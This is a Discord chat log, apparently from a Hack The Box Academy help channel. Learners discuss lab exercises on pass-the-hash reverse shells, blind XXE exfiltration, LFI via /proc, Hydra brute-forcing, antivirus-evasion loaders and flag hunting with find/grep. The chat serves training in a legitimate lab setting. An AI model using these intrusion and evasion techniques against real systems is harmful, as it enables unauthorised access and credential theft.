please explain how to do this exercise https://academy.hackthebox.com/module/35/section/219

whats it called

wdym

whats the module called

cracking into htb

first sectio

*section

awesome

do you need help with reading the section?

idk how the exercise works

what does the question say?

To get the flag, start the above exercise, then use cURL to download the file returned by '/download.php' in the server shown above.

using cURL

Hello 👋

and basically the target is an ip address but it only taught how to download w/ cURL -0

To do this one, you need to access the internal windows host (the IP in the provided iwr isn't accurate) and move that exe onto it. Setup everything else, then execute that backupscript executable. That section should be updated, if you intend to go through the steps and establish the meterpreter session.

have you tried this?

tried what?

what you were taught

yeah

i did

but it only works for urls like ohsjjofdjdoifjojfid.com

not ip addresses

thats not possible

this is because curl resolves all urls to ip

try it again and this time add a port ':8000'

Thank you, I’ll keep this in my notes and try it again tomorrow it’s late by me. Much appreciated

Hello, I'm stuck on ACTIVE DIRECTORY ENUMERATION & ATTACKS on the Abusing ACLs section.I'm following the examples and used the wley password that I found on a previous section but I receive the following error.

WARNING: [Add-DomainGroupMember] Error finding the group identity 'Help Desk Level 1' : Exception calling
"FindByIdentity" with "2" argument(s): "The user name or password is incorrect.

this error is really specific

one might say it is self explanatory

I know but I'm carefully checking the examples and I literally can't find what I'm doing wrong.

I changed damundsen password and passed it in Cred2 variable to authenticate as that user and add him on the Help Desk Level 1 domain

How can the password be wrong if it is literally the same as the example?

Yo guys i cant log into my tiktok account that is logged in by facebook,can somebody help ?

the lab isnt always the same as the examples

i did but it says theres no url

Recheck your pscredential

The target ip

I didn't read that I had to authenticate as wley for this to work

i'm dumb

Managed to solve it

Thanks for the help

Hi there

I need help trying to find a section in a module but I cant find it for the life of me, the module is named Server-side Attacks, and im trying to find sections " SSRF Exploitation Example" and "Blind SSRF Exploitation Example". I looked on the fourms and it appears that there is posts regarding the section "Blind SSRF Exploitation Example" but it was from 2023 or 2022, did the section get removed or moved somewhere else?

We see the messages bro 😭🙏

I have a problem with module Pass the Hash (PtH) of the Password Attacks

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

I can t get the reverse shell

Can you DM your Base64 to me so I can check it out?

Hi, any one explain me how Kali vm can capture wireless traffic even NIC was bridge or can't, so what's difference between bridge and nat

Kali vm is same dual boot Kali on host bare metal virtualization

Neither I need to install Kali on my device like win for test if Kali can capture wireless traffic nor I should use USB for monitor mode

You should use a USB regardless

Using a USB allows for better control and less chance of a fuckup

Nice

That question is kinda off-topic though, I suggest reading and following #welcome to have access to other channels

I do it

When you download a cheatsheet from HTB, the filename is "cheatsheat-{Name of Module}.md"

Note: "cheatsheat"

Is this some sort of British spelling? Meant to be funny? Or is it a mistake?

hey, excuse me...

i have tried my best, i don't want to get the answer from other websites

i am trying to do the

linux privilage escalation

i did my best to get the answer, i have spent 3 days to find it, refusing to get the answer by other means but myself

i am doing the first section the Environment Enumeration section

i crafted even very special find commands to find it

to find the flag which usually starts with HTB or htb

nothing to be found...

the flag is no where to be seen

Hey hey! what's up!

Not much, you?

good! seems like you are new into this journey of cyber security at least to the website!

also, i don't think we should talk here, or do you have a question for some of the modules?

u wouldve found it then

find + grep

yes

i crafted the following command

find / -type f -exec ls -l {} ; 2>/dev/null | grep -o "HTB"

also tried it for htb

i added the -o switch because files contains binaries

that grep isnt looking in files btw

ah

i forgot to tell you

no point of doing ls either

not that one

this is not it i forgot it, i did that 3 days ago

actually it was this:

find / -type f -exec cat {} ; 2>/dev/null | grep -o "HTB"

why not exec grep?

it will check in files too

hmmm i mean sure, we can d that as well

i just did it with a cat

i didn't use grep that way before that's why

i always used grep with cat before it

but you are correct, we can use grep with the file name and the matching pattern

hi I wrote notes for pass the ticket from Windows section of password attacks module and rewrote notes for the prerequisite section from Intro to AD module yesterday. I took a break today from working on it but I aim to reread both sections and take notes again from scratch tomorrow possibly. Am I taking the right approach to learning it?

I want to really understand what I'm doing if that makes sense

looks like ur missing the \ too

ah

i am not

but yeah found it! thank you for assurance

i guess i didn't try that time much because

i didn't run the bash shell and so, i felt lazy to try it agian

now it worked fine

Hmmmmmmmmm @safe star

htb-student@ubuntu:/$ find / -type f -exec cat {} 2> /dev/null ; | grep "HTB{" now i tried it and i got binary matches, and i didn't get it, seems like it's because of adding the cat, but why so?

it should be the same, no? catting then grepping, or grepping the files immidiately

ur command has a lot of errors

it doesn't it actually worked, i just checked, the issue was that cat prints binaries which grep doesn't know how to deal with it

i mean, tell me! sorry hahaha i meant my command actually worked now that i added --text

find / -type f -exec cat {} 2> /dev/null \; | grep --text "HTB{"

but, you know better than me, what's the error in my command?

btw it's discord bug that \; wasn't printed

put two slashes to escape it

thank you!

i didn't know that discord actually works like programming in that case

that's strange thanks for that heads up!

yeah its the same but cat is just extra work

yeah, i don't know why, but i think maybe i got that when i learnt before from some place

pretty sure grep -r would work too

no find command needed

where they used cat someFile | grep x

you mean grep recursive, yeah

probably

HAHAHAHA

WORKED IMMIDIATELY

yeah i also do that too sometimes with cat | wc -l

does grep -r starts always from the / ?

probably the current directory

hmmmm i mean that's what i thought but i tried to enter to a directory that didn't contain the flag, then i ran the command in it yet i got the flag, so maybe it starts from /

nvm

i am wrong

Can help me how very complete the the box my friend in my computer can you tell me

They updated the module, that section isn't there anymore

hey for the "Introduction to Windows Evasion Techniques" module, seems like the logs.txt is showing:

[11/27/2024 21:25:57] C:\Alpha\Static\htb_ldr1.exe - OK - Undetected by Microsoft Defender Antivirus

but flag.txt isn't appearing

anyone else had this?

which section

static

that one was a pretty big pita, but it's doable

have to make sure every little thing is perfect

i used aes encryption, and make sure you are building it in VS with a C# console app (.net framework)

do i need to rename the file to whatever it is

i don't believe the name matters but i could be wrong

.-. does it have to be c#?

my loader is already in the folder and gets past their windef

that's how the module shows it

oh man

i think originally that's why it didn't work for me

heyyy guys

Hi there. Please read #welcome and #rules it will explain how to get verified and access #general

Half way though Windows Fundamentals. Love the knowledge I'm gaining from it. As someone that's used Windows every day for years just as a casual user, I never realized just how much there really is to it. \

i have an issue with BLind data Exfilltieration lab i could not find of the flag because it is only closing

can anyone help me

best to say which module/section you're on

Web attack module

i stuck there for 1 day

what are you having trouble with

[Thu Nov 28 00:57:31 2024] 10.129.158.130:53200 [200]: GET /xxe.dtd
[Thu Nov 28 00:57:31 2024] 10.129.158.130:53200 Closing
[Thu Nov 28 00:57:32 2024] 10.129.158.130:53204 Accepted
[Thu Nov 28 00:57:32 2024] 10.129.158.130:53204 [200]: GET /xxe.dtd
[Thu Nov 28 00:57:32 2024] 10.129.158.130:53204 Closing
[Thu Nov 28 00:57:33 2024] 10.129.158.130:53208 Accepted
[Thu Nov 28 00:57:33 2024] 10.129.158.130:53208 [200]: GET /xxe.dtd
[Thu Nov 28 00:57:33 2024] 10.129.158.130:53208 Closing

i have this issue with dtd file

also, i refernce the correct entity

did you create the index.php file

yes

you should probably delete that stuff as it's giving away content of the module

but it looks like your dtd is calling to the target instead of your own vpn ip

i understood everything without a FLAW

I MADE IT

ohit might be that issue , okkk

I have a question! For example, you dump all the credentials on MS01 using a local administrator account. Is there a way to identify which domain joined accounts has administrative privileges on the DC? Not all domain joined accounts has elevated privileges on the DC, some are just domain joined accounts, some are elevated users, so how do you identify which one is elevated after you're done harvesting the domain joined accounts? Just by trial and error, trying which one can cast a command to add a user on list of administrators?

Lets say for example we're attacking a real enterprise network, you cannot just do trial and error on all those domain joined accounts. So, how do you identify which domain joined accounts are elevated and which ones aren't?

Hey im doing wired equalent attacks nee module and i need to get the access point ip and stations ip address it shows a command using tcpdump and cap file but i dont get both the ips

Never mind use 255.255.255.255 for both this allows us to handle packets without specifying ip

bloodhound, powerview. usually they're just in default groups like "domain admins" and you can look in there, etc. there's also the 'net' command like net localgroup administrators or net group 'domain admins' /domain

by checking groups and just trying it out

i check everything again after getting a new user

Hi everyone. Just starting out the cdsa, working on the Javascript Deobfuscation module, the task after reverse enginering...im pretty sure ive found the flag but its not it, any hints on what i could be missing

Make sure there are no spaces at the end or start of the flag

Thank you

Hi everyone, does it matter if I do the infosec modules in order. I’m currently on the linux fundamentals and I wanted to know if it will hurt if i mixed in some windows fundamentals; here and there.

it doesn't matter

windows and linux are 2 completely different OSs with fairly different concepts.

Thanks for the reply…i just think 30 sections of linux only can get a little stale.

You can dm me

Hey guys I'm new here. Can I get to know how do I start?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I just have to share that i finished the HTB Pentest Path recently and started doing the PEN-200. The module for Report Writing on HTB is a way, way better and detailed compared to the pen-200... So good job to the HTB team on that! Will see how the rest goes. 🙂

I've been doing the Skill Assessment for sqlpmap essentialas and after a lot of fiddling I managed to access the database where the flag is located, but just as I was about to dump the flag the target shut down and I had to restart it, now that I knew how to access it so I did exactly the same things as before but now it didn't work at all. I read a little about that --temper changes the response from the server, in combination with the different tamper scripts, affects how sqlmap works, so I then instead try to run without tamper etc. and with different tampers with , but nothing works, can someone point me in the right direction again, the flag was right in front of me, typically that the time for the goal would run out!

could anyone pls help me figure out why my hydra isnt working

what do you mean not working ?

It takes time! it is working!???!

Hello 👋

im waiting for this

yes... just wait..!

does my command look fine?

yes.. try hit spacebar to see satus

if your command was bad o cant run it.. so like u see, it is just fine

maybe Im using the wrong username list or something because this is really slow

if the list is big it takes time. brute-force can take loong time!

did you see status when you hit spacebar?

box is about to die in 3 minutes too

then restart the box and do it agin.. maby filter the list or or something.. your syntax is ok, just let it run.. or try difrent lists

yeah this is not good something is wrong

nothing is (necessarily) wrong, rockyou is a large list so unless the exercise authors picked a password that's at the top it will take long to break

either use a smaller list, or check if your http-get syntax is correct if you feel like you should be using rockyou

I have changed it

you now have a large username list. Same problem, hydra will go through all combinations

yeah changed it again

does the module you are doing provide user/pass lists in resources ?

yeah gonna give that a try

wow

took 1 second

if not, I'd suggest checking which lists are used in the module's example and sticking to those. I think you're on the Login Bruteforce module, which I haven't done yet, but the following "heuristic" served me well for the Password Attacks module:
1st try the provided lists
2nd try the mutated list, though it's large it'll hopefully crack quickly thanks to the author
3rd try the list used in the related content example
4th try rock you and hope it's quick again thanks to the author
Override: if the question hints at anything else

I've been doing the Skill Assessment for sqlpmap essentialas and after a lot of fiddling I managed to access the database where the flag is located, but just as I was about to dump the flag the target shut down and I had to restart it, now that I knew how to access it so I did exactly the same things as before but now it didn't work at all. I read a little about that --temper changes the response from the server, in combination with the different tamper scripts, affects how sqlmap works, so I then instead try to run without tamper etc. and with different tampers with , but nothing works, can someone point me in the right direction again, the flag was right in front of me, typically that the time for the goal would run out!
Have now tried so many different ways without finding the right one.. Plz point me in the right direction!

YEAH I USED THE FRICKING TARGET IP WITH THE PORT PROVIDED AND IT SAYS THAT THERE IS NO FRICKING URL

god this crap is tiring..

sorry i kinda snapped when the same answer got repeated for like the fourth time

just post what you've tried to do with the IP

Why do i get 100000ms on cloning gobuster

hello , I have a question on (Nosql injection skill assessment 2) I have dumped the hash of the user b*, but I am not able to crack it. Can you give me a hint, please?

Take a look at the functions on the website. There is another way to get the user's password.

no one can point me out?

The File Inclusions assessment was cool. A few curveballs to slow me down.

One thing mentioned in the module is

The User-Agent header is also shown on process files under the Linux /proc/ directory. So, we can try including the /proc/self/environ or /proc/self/fd/N files (where N is a PID usually between 0-50), and we may be able to perform the same attack on these files. This may become handy in case we did not have read access over the server logs, however, these files may only be readable by privileged users as well. 

Although there's a lot of useful stuff that comes out of /proc, I have not been able to find the user agent and exploit LFI through this avenue and I haven't found any clear info after some brief search engine queries. Am I missing where to find this or is it not possible in the labs?

Mmm... payload all the things suggests it should be available in /environ and that just didn't work in the labs / assessment. If someone did get it to work and I'm missing something, let me know.

You can DM what you are trying and I can look at it.

In Intro to Assembly Language/Syscall section, is this mov rcx, string is a typo? because the register which we used to mention the second argument for storing the message is rsi as we can see from the points but instead the author mentioned it as rcx (which is used to store 4th argument) but there is no 4th argument in the write syscall ?

looks fine to me

sorry for the confusion, the context is that the author mentioned that we can use mov rcx, string also instead of the mov rsi, message (In here mesage is a variables label) and what i considered as a typo is for storing the message data(which is the second argument) we need to use $rsi register but the author mentioned it as $rcx register in mov rcx, string. let me know your thoughts on this pls?

yes you're right

should be mov rsi, 'string'

something to report in #1234357888114364508

Thanks for the clarification 👍

Hey im in the advanced wep cracking section here to solve a question decrypt a .cap file and submit password from it i got the dcap fil and opend it in wireshark but no password is found

Hey guys I want to start to learn hacking where do I start

Bro just show the command

Doesn’t even make sense

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@fringe trail ^

anyone here knows what does lxc.cgroup.cpu.shares mean

it states cpu time but i cant find like what it means

is it higher priotity, more resources or what

Connect to the WiFi network and submit the flag found at IP 192.168.1.1 or 192.168.2.1.

can anyone please help me answer this question

it is the last section of the wifi pentesting basics module on academy

i have found the ssid and the password of the network but i am unable to connect to it i have tried all the three methods mentioned in the connecting to wifi section of the module

heyy i had problems with this too, pay attention to the other available networks and most importantly, pay attention to mac addresses

should i connect to the other hidden network then?

the question is worded so badly i dont even know which one to connect to

you just have to wget the ip thats not the hard part

remember the different GHz

Hey in the skill assesment of wired equalent privacy attack there is a question to connect to the wifi network using key found and browse to a ip to get the flag i cant seem to see anyway to connect to wifi here

You have two options GUI or CLI

Gui isnt showing any wifi connections available

I was hoping I could get some help with the following:

Hunting Evil with Sigma (Chainsaw Edition)

Use Chainsaw with the "C:\Tools\chainsaw\sigma\rules\windows\powershell\powershell_script\posh_ps_win_defender_exclusions_added.yml" Sigma rule to hunt for suspicious Defender exclusions inside "C:\Events\YARASigma\lab_events_5.evtx". Enter the excluded directory as your answer.

However, no directory in this image worked. I've tried different mappings but they all yield the same two event

.\chainsaw_x86_64-pc-windows-msvc.exe hunt C:\Events\YARASigma\lab_events_5.evtx -s C:\Tools\chainsaw\sigma\rules\windows\powershell\powershell_script\posh_ps_win_defender_exclusions_added.yml --mapping .\mappings\sigma-event-logs-all.yml

Running the above command gives this output

Module: password attacks, section: password mutations
Task is to brute force password (doesn't say which service) but when I create file with mutated passwords, it contains almost 100k passwords which cause brute force with hydra to be very slow so I am not sure if I do something wrong?

I am trying to brute force ftp because when I try ssh it gives me error

you should use FTP or SSH on -t4

I know that PW attacks takes a while but if you Ctrl+C + Ctrl+V the mut_password.list cmd you should be good

With t 4 it is 4 password per second on average

And I have 100k passwords list?

hydra will force t4 on ssh anyway. You're doing it right attacking FTP instead. Be patient. Most of the time, the right password will be near the top of the list, so the size won't matter

there is one case where it's further down, and it took my system 40-60 minutes to crack. I gave feedback because it was quite excessive and pointless. But it was the only case I can remember in the whole module

I don't remember which exercise it was, might be the one you're on but I don't think so. Just be patient

btw some people here resorted to breaking the mutated list into several lists. I would advise against it, given how the passwords are usually cooked to the start of the original list

Any clue ?

Module: Web Attacks, section: Web Attacks - Skills Assesment
Could anyone give me a hand on figuring out getting into the Admin account, im pretty sure iv got 90% of what I need to do it but cant get it to work

careful not to spoil the content of the modules/skill assessment

I did not spoil 😢

jus asked for help

you showed the hash for julio

Ok 👍

Can i dm you regarding this question?

i can't help right now but you can ask in here

Ok

I am not able to get the rev shell in Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt. Can someone help?

module/section?

Password attacks : Pass the Hash section

You can dm me if it's something you can't post here

Ok ill dm you

I just started using this, but I am having problems with the linux fundamental, it's not accepting the answer for the kernel version it is running on

i ran uname -v and -r but they both respond with 6.5.13 and that isn't correct for some reason?

Make sure you are performing that against the target machine and not your VM or the pwnbox machine.

oh

i may be stupid

Nah, it's all good. Happens.

thank you!

Are the linux and windows priv esc modules for beginners...like the ones 0 in privesc?

The entire CPTS, including the privilege escalation modules, is designed for beginners. However, hacking itself is not a beginner-friendly area of IT.

No I mean I have basic linux netowrking knowledge some scripting some backend dev....would that be enoguh.... Also I am a 3rd year cse student if that counts as IT

Bro??

You asked if the priv esc modules are for beginners. what you're asking here is a totally different question.

the modules alone are enough to learn what you need

I gave my background as a context

there is some prerequisite knowledge you need like windows & linux fundmanetals, networking, etc, but there are modules for those things too

your person background has nothing to do with 'are privesc modules made for beginners'

I guess it wont be beginner friendly to me

Understood

that's illegal, so no

Mann

#rules i suggest reading them

This isn’t hacker for hire

Sorry i didnt know

If you read the #rules, you'd know

:)

I’m a current student within cyber, going into 3rd uni next year, started on the Linux fundamentals to get used to htb, any other modules people can recommend?, don’t mind paying

What’s your goal? What do you want to learn?

Hey can someone help me with skill assesment of wired equalent privacy attack there is a question to connect to the wifi network using key found and browse to a ip to get the flag i cant seem to see anyway to connect to wifi here

Yea now ik,but does anyone know what i should do ? Im sorry if this question is against the rules too

Contact TikTok

contact tiktok

If you need help getting back into your own account, tiktok support

Thanks 🙂

I’m planning on doing a lot of the SOC analysis stuff as was there recently to learn about it from a work perspective and interested me and is ultimately where I hope to end up, is the labs a good idea to get practice, once I have a somewhat understanding of it all?

Academy has a nice SOC path

That caught my eye when I was looking earlier, but wanted to get a good idea of the VM so done a module on Linux fundamentals so I can get a good understanding of the shell

But when I was having a look at the labs, I felt quite out the loop so i think I’ll stick to the academy until I’m brave enough to do any labs